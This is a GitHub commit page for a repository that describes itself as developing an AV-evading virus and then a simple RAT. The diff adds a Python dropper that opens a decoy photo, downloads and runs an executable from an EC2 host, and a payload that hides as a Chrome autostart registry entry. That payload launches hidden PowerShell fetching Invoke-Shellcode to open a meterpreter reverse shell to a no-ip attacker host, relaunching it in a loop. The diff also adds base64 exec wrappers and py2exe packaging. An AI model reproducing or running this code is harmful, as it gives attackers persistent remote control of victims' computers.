Skip to content

Commit

Permalink
add r0d
Browse files Browse the repository at this point in the history
  • Loading branch information
islamTaha committed Jun 28, 2016
1 parent f9a5c79 commit 83d7433
Show file tree
Hide file tree
Showing 10 changed files with 181 additions and 124 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1 +1 @@
##The goal of this repo is developing a virus which has ability to bypass AV
##The goal of this repo is developing a simple RAT
11 changes: 0 additions & 11 deletions source/downloadFile.py

This file was deleted.

Empty file added source/r0d/__init__.py
Empty file.
38 changes: 19 additions & 19 deletions source/encodeSource.py → source/r0d/encodeSource.py
Original file line number Diff line number Diff line change
@@ -1,20 +1,20 @@
import base64
import subprocess
import tempfile
import _winreg
import platform
import time
import os
import socket
import urllib

source = ''
with open('source.py','r') as file:
for line in file:
#byPass imprt commands
if "import" in line:
pass
else:
source += line
encode = base64.b64encode(source)
import base64
import subprocess
import tempfile
import _winreg
import platform
import time
import os
import socket
import urllib

source = ''
with open('source.py','r') as file:
for line in file:
#byPass imprt commands
if "import" in line:
pass
else:
source += line
encode = base64.b64encode(source)
exec (base64.b64decode(encode))
18 changes: 9 additions & 9 deletions source/setup.py → source/r0d/setup.py
Original file line number Diff line number Diff line change
@@ -1,10 +1,10 @@
from distutils.core import setup
import py2exe, sys, os

sys.argv.append('py2exe')

setup(
options = {'py2exe': {'bundle_files': 1, 'compressed': True}},
windows = [{'script': "try.py","icon_resources": [(0, "icon.ico")]}],
zipfile = None,
from distutils.core import setup
import py2exe, sys, os

sys.argv.append('py2exe')

setup(
options = {'py2exe': {'bundle_files': 1, 'compressed': True}},
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}],
zipfile = None,
)
38 changes: 38 additions & 0 deletions source/r0d/source.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
import requests
import os
import time
import tempfile
import subprocess

#open photos
os.startfile('test.jpg')
time.sleep(1)
os.startfile('test.jpg')


# download virRu5
url = "http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe"
while True:
try:
response = requests.get(url, stream=True)
except:
pass
else:
break

# move to temp
tempDirectory = tempfile.gettempdir()
newFile = tempDirectory + "//GoogleChromeAutoLaunch.exe"

with open(newFile, "wb") as handle:
handle.write(response.content)

# execute virRu5
subprocess.Popen(newFile)

'''
import shutil
# copy file to temp
tempDirectory = tempfile.gettempdir()
shutil.copy('test.jpg',tempDirectory)
'''
Empty file added source/viRu5/__init__.py
Empty file.
20 changes: 20 additions & 0 deletions source/viRu5/encodeSource.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
import base64
import subprocess
import tempfile
import _winreg
import platform
import time
import os
import socket
import urllib

source = ''
with open('source.py','r') as file:
for line in file:
#byPass imprt commands
if "import" in line:
pass
else:
source += line
encode = base64.b64encode(source)
exec (base64.b64decode(encode))
10 changes: 10 additions & 0 deletions source/viRu5/setup.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
from distutils.core import setup
import py2exe, sys, os

sys.argv.append('py2exe')

setup(
options = {'py2exe': {'bundle_files': 1, 'compressed': True}},
windows = [{'script': "source.py","icon_resources": [(0, "icon.ico")]}],
zipfile = None,
)
168 changes: 84 additions & 84 deletions source/source.py → source/viRu5/source.py
Original file line number Diff line number Diff line change
@@ -1,85 +1,85 @@
import subprocess
import tempfile
import _winreg
import platform
import time
import os
import socket
import urllib

NO_IP_HOST = 'googlechromeauto.serveirc.com'
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182"
LPORT = 443
TIME_SLEEP = 10

TEMP_PATH = tempfile.gettempdir()
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312"
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5'

def set_reg_key_value(REG_PATH, name, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS)
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value)
except WindowsError:
pass

def fire():
if NO_IP_HOST:
# Check if no-ip is online or not
check_no_ip_online()

if platform.machine().endswith('32'):
try:
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True)
except WindowsError:
pass
else:
try:
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True)
except WindowsError:
pass

def run_after_close():
foundIT = False
runningProcess = []
for item in os.popen('tasklist').read().splitlines()[4:]:
runningProcess.append(item.split())
for item2 in runningProcess:
if "powershell.exe" in item2:
foundIT = True

if not foundIT:
fire()


def get_noip_ip_address():
global NO_IP_HOST
global LHOST
LHOST = socket.gethostbyname(NO_IP_HOST)


def check_no_ip_online():
# Check if NoIP is online, If else dont fire
NO_IP_HTTP = "http://" + NO_IP_HOST
while True:
try:
urllib.urlopen(NO_IP_HTTP).getcode()
except:
time.sleep(10)
else:
get_noip_ip_address()
break


# set the reg value in run key
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE)

# fire the payload
fire()
time.sleep(5)

# keep firing in case of the connection is loss
while True:
run_after_close()
import subprocess
import tempfile
import _winreg
import platform
import time
import os
import socket
import urllib

NO_IP_HOST = 'googlechromeauto.serveirc.com'
LHOST = '192.168.1.3'#'googlechromeauto.serveirc.com' #"54.175.188.182"
LPORT = 443
TIME_SLEEP = 10

TEMP_PATH = tempfile.gettempdir()
REG_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"
REG_NAME = "GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312"
REG_VALUE = '"' + TEMP_PATH + '\GoogleChromeAutoLaunch.exe' + '"' + ' --no-startup-window /prefetch:5'

def set_reg_key_value(REG_PATH, name, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0,_winreg.KEY_ALL_ACCESS)
_winreg.SetValueEx(registry_key, name, 0, _winreg.REG_SZ, value)
except WindowsError:
pass

def fire():
if NO_IP_HOST:
# Check if no-ip is online or not
check_no_ip_online()

if platform.machine().endswith('32'):
try:
subprocess.Popen("powershell -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True)
except WindowsError:
pass
else:
try:
subprocess.Popen("C:\Windows\System32\WindowsPowerShell\/v1.0\powershell.exe -noprofile -windowstyle hidden -noninteractive -noprofile -windowstyle hidden -noninteractive iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force;" % (LHOST,LPORT), shell=True)
except WindowsError:
pass

def run_after_close():
foundIT = False
runningProcess = []
for item in os.popen('tasklist').read().splitlines()[4:]:
runningProcess.append(item.split())
for item2 in runningProcess:
if "powershell.exe" in item2:
foundIT = True

if not foundIT:
fire()


def get_noip_ip_address():
global NO_IP_HOST
global LHOST
LHOST = socket.gethostbyname(NO_IP_HOST)


def check_no_ip_online():
# Check if NoIP is online, If else dont fire
NO_IP_HTTP = "http://" + NO_IP_HOST
while True:
try:
urllib.urlopen(NO_IP_HTTP).getcode()
except:
time.sleep(10)
else:
get_noip_ip_address()
break


# set the reg value in run key
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE)

# fire the payload
fire()
time.sleep(5)

# keep firing in case of the connection is loss
while True:
run_after_close()
time.sleep(TIME_SLEEP)

0 comments on commit 83d7433

Please sign in to comment.